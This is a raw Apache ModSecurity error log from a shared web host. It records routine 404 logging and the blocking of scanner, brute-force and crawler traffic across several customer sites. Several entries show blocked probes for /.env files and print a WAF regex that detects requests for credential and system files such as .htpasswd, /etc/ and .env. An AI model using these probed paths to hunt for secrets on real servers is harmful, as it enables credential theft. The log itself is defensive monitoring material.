[Tue May 26 15:39:27.456515 2026] [security2:error] [pid 733610:tid 733815] [client 5.255.126.59:50968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHnQAAAEs"]
[Tue May 26 15:39:27.462054 2026] [security2:error] [pid 733610:tid 733788] [client 5.255.126.59:51250] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHmgAAADA"]
[Tue May 26 15:39:27.469051 2026] [security2:error] [pid 733610:tid 733776] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxVsLL_4PasUNKBsfHoAAAACQ"]
[Tue May 26 15:39:28.403986 2026] [security2:error] [pid 733610:tid 733830] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH5QAAAFo"]
[Tue May 26 15:39:28.416957 2026] [security2:error] [pid 733610:tid 733824] [client 5.255.126.59:51164] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHxwAAAFQ"]
[Tue May 26 15:39:28.420460 2026] [security2:error] [pid 733610:tid 733811] [client 5.255.126.59:51062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHwwAAAEc"]
[Tue May 26 15:39:28.426517 2026] [security2:error] [pid 733610:tid 733838] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH5gAAAGI"]
[Tue May 26 15:39:28.437945 2026] [security2:error] [pid 733610:tid 733761] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH6QAAABU"]
[Tue May 26 15:39:28.923744 2026] [security2:error] [pid 733610:tid 733794] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH_QAAADY"]
[Tue May 26 15:39:29.314804 2026] [security2:error] [pid 733610:tid 733844] [client 5.255.126.59:51112] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfH1AAAAGg"]
[Tue May 26 15:39:29.318517 2026] [security2:error] [pid 733610:tid 733816] [client 5.255.126.59:51294] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHzwAAAEw"]
[Tue May 26 15:39:29.323901 2026] [security2:error] [pid 733610:tid 733834] [client 5.255.126.59:51180] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHvwAAAF4"]
[Tue May 26 15:39:29.357038 2026] [security2:error] [pid 733610:tid 733827] [client 5.255.126.59:51264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHvgAAAFc"]
[Tue May 26 15:39:29.360125 2026] [security2:error] [pid 733610:tid 733825] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHxgAAAFU"]
[Tue May 26 15:39:29.363573 2026] [security2:error] [pid 733610:tid 733759] [client 5.255.126.59:50982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfH0wAAABM"]
[Tue May 26 15:39:29.369796 2026] [security2:error] [pid 733610:tid 733771] [client 5.255.126.59:51312] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHywAAAB8"]
[Tue May 26 15:39:29.379472 2026] [security2:error] [pid 733610:tid 733782] [client 5.255.126.59:50968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfH0QAAACo"]
[Tue May 26 15:39:29.380958 2026] [security2:error] [pid 733610:tid 733826] [client 5.255.126.59:51224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHzAAAAFY"]
[Tue May 26 15:39:29.386635 2026] [security2:error] [pid 733610:tid 733842] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH5AAAAGY"]
[Tue May 26 15:39:29.386942 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:51308] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHyQAAACg"]
[Tue May 26 15:39:29.388951 2026] [security2:error] [pid 733610:tid 733749] [client 5.255.126.59:51076] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHxAAAAAk"]
[Tue May 26 15:39:29.395769 2026] [security2:error] [pid 733610:tid 733858] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfHuQAAAHY"]
[Tue May 26 15:39:29.412253 2026] [security2:error] [pid 733610:tid 733779] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH6AAAACc"]
[Tue May 26 15:39:29.414850 2026] [security2:error] [pid 733610:tid 733744] [client 5.255.126.59:51188] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxV8LL_4PasUNKBsfH0gAAAAQ"]
[Tue May 26 15:39:29.428598 2026] [security2:error] [pid 733610:tid 733857] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH5wAAAHU"]
[Tue May 26 15:39:29.430411 2026] [security2:error] [pid 733610:tid 733799] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH6wAAADs"]
[Tue May 26 15:39:29.432765 2026] [security2:error] [pid 733610:tid 733742] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH4wAAAAI"]
[Tue May 26 15:39:29.435251 2026] [security2:error] [pid 733610:tid 733750] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH4gAAAAo"]
[Tue May 26 15:39:29.449850 2026] [security2:error] [pid 733610:tid 733819] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH4AAAAE8"]
[Tue May 26 15:39:29.450759 2026] [security2:error] [pid 733610:tid 733743] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxWMLL_4PasUNKBsfH6gAAAAM"]
[Tue May 26 15:39:31.054193 2026] [security2:error] [pid 733610:tid 733785] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxWsLL_4PasUNKBsfINwAAAC0"]
[Tue May 26 15:39:33.130676 2026] [security2:error] [pid 733610:tid 733820] [client 223.123.38.127:15215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxXcLL_4PasUNKBsfIbgAAAFA"]
[Tue May 26 15:39:33.130809 2026] [security2:error] [pid 733610:tid 733820] [client 223.123.38.127:15215] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxXcLL_4PasUNKBsfIbgAAAFA"]
[Tue May 26 15:39:33.147306 2026] [security2:error] [pid 733610:tid 733789] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxXMLL_4PasUNKBsfIagAAADE"]
[Tue May 26 15:39:34.171687 2026] [security2:error] [pid 733610:tid 733847] [client 167.160.69.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxXsLL_4PasUNKBsfIhgAAAGs"], referer: https://www.anujtradingco.com/
[Tue May 26 15:39:36.045988 2026] [security2:error] [pid 733610:tid 733764] [client 167.160.69.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxX8LL_4PasUNKBsfIuwAAABg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1457543&moderation-hash=29476bbb15d6cb69a2b842370162a3b7
[Tue May 26 15:39:36.511719 2026] [security2:error] [pid 733610:tid 733780] [client 103.153.130.62:55941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxYMLL_4PasUNKBsfI2AAAACg"]
[Tue May 26 15:39:36.511821 2026] [security2:error] [pid 733610:tid 733780] [client 103.153.130.62:55941] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxYMLL_4PasUNKBsfI2AAAACg"]
[Tue May 26 15:39:37.281310 2026] [core:crit] [pid 733610:tid 733847] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:39:37.614838 2026] [security2:error] [pid 733610:tid 733790] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxYcLL_4PasUNKBsfI6gAAADI"]
[Tue May 26 15:39:37.853052 2026] [security2:error] [pid 733610:tid 733721] [remote 172.104.164.56:59574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVxYcLL_4PasUNKBsfI-gAAL24"]
[Tue May 26 15:39:38.413487 2026] [security2:error] [pid 733610:tid 733746] [client 195.178.110.34:35188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.d2cargo.com"] [uri "/phpinfo.php"] [unique_id "ahVxYsLL_4PasUNKBsfJFgAAAAY"]
[Tue May 26 15:39:39.795410 2026] [security2:error] [pid 733610:tid 733762] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxY8LL_4PasUNKBsfJLQAAABY"]
[Tue May 26 15:39:40.467029 2026] [security2:error] [pid 733610:tid 733772] [client 114.119.128.56:64671] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVxZMLL_4PasUNKBsfJUAAAACA"], referer: http://glorodavionics.com/beta/index.php?route=common%2Fhome
[Tue May 26 15:39:40.572821 2026] [security2:error] [pid 733610:tid 733623] [remote 216.73.216.30:17663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxZMLL_4PasUNKBsfJUgAARQw"]
[Tue May 26 15:39:40.690676 2026] [security2:error] [pid 733610:tid 733624] [remote 216.73.216.30:17663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxZMLL_4PasUNKBsfJWQAARQ0"]
[Tue May 26 15:39:40.995292 2026] [security2:error] [pid 733610:tid 733627] [remote 216.73.216.30:17663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxZMLL_4PasUNKBsfJaAAARRA"]
[Tue May 26 15:39:41.610371 2026] [security2:error] [pid 733610:tid 733784] [client 66.249.66.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxZMLL_4PasUNKBsfJRQAALAQ"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:42.100303 2026] [security2:error] [pid 733610:tid 733860] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxZcLL_4PasUNKBsfJgwAAAHg"]
[Tue May 26 15:39:42.200297 2026] [security2:error] [pid 733610:tid 733784] [client 66.249.66.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxZcLL_4PasUNKBsfJdQAALBE"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:42.223898 2026] [security2:error] [pid 733610:tid 733801] [client 167.160.69.208:14183] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVxZcLL_4PasUNKBsfJhAAAAD0"], referer: https://anujtradingco.com
[Tue May 26 15:39:42.302254 2026] [security2:error] [pid 733610:tid 733784] [client 66.249.66.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxZcLL_4PasUNKBsfJeQAALBI"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:42.696407 2026] [security2:error] [pid 733610:tid 733750] [client 202.76.129.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxZsLL_4PasUNKBsfJmwAAAAo"]
[Tue May 26 15:39:43.188965 2026] [core:crit] [pid 733610:tid 733808] (13)Permission denied: [client 40.77.167.230:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:39:43.750915 2026] [security2:error] [pid 733610:tid 733749] [client 195.178.110.34:35190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.d2cargo.com"] [uri "/phpinfo.php"] [unique_id "ahVxZ8LL_4PasUNKBsfJxQAAAAk"]
[Tue May 26 15:39:43.856311 2026] [security2:error] [pid 733610:tid 733847] [client 66.249.66.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxZsLL_4PasUNKBsfJqgAAax0"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:44.016550 2026] [security2:error] [pid 733610:tid 733820] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxZ8LL_4PasUNKBsfJvgAAAFA"]
[Tue May 26 15:39:44.930890 2026] [security2:error] [pid 733610:tid 733795] [client 66.249.66.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxZ8LL_4PasUNKBsfJ0QAANyI"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:45.163325 2026] [security2:error] [pid 733610:tid 733729] [remote 66.249.66.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVxaMLL_4PasUNKBsfJ2AAAN3Y"], referer: https://kingsclub.in/badminton/
[Tue May 26 15:39:45.736515 2026] [security2:error] [pid 733610:tid 733856] [client 208.84.100.247:18472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env"] [unique_id "ahVxacLL_4PasUNKBsfKBgAAAHQ"]
[Tue May 26 15:39:45.736567 2026] [security2:error] [pid 733610:tid 733852] [client 208.84.100.247:18506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/api/.env"] [unique_id "ahVxacLL_4PasUNKBsfKCAAAAHA"]
[Tue May 26 15:39:45.737413 2026] [security2:error] [pid 733610:tid 733781] [client 208.84.100.247:18500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/app/.env"] [unique_id "ahVxacLL_4PasUNKBsfKCwAAACk"]
[Tue May 26 15:39:45.740114 2026] [security2:error] [pid 733610:tid 733763] [client 208.84.100.247:18512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/backend/.env"] [unique_id "ahVxacLL_4PasUNKBsfKGQAAABc"]
[Tue May 26 15:39:46.300948 2026] [security2:error] [pid 733610:tid 733852] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxacLL_4PasUNKBsfKYAAAAHA"]
[Tue May 26 15:39:46.967939 2026] [security2:error] [pid 733610:tid 733749] [client 103.153.130.62:56199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxasLL_4PasUNKBsfKhwAAAAk"]
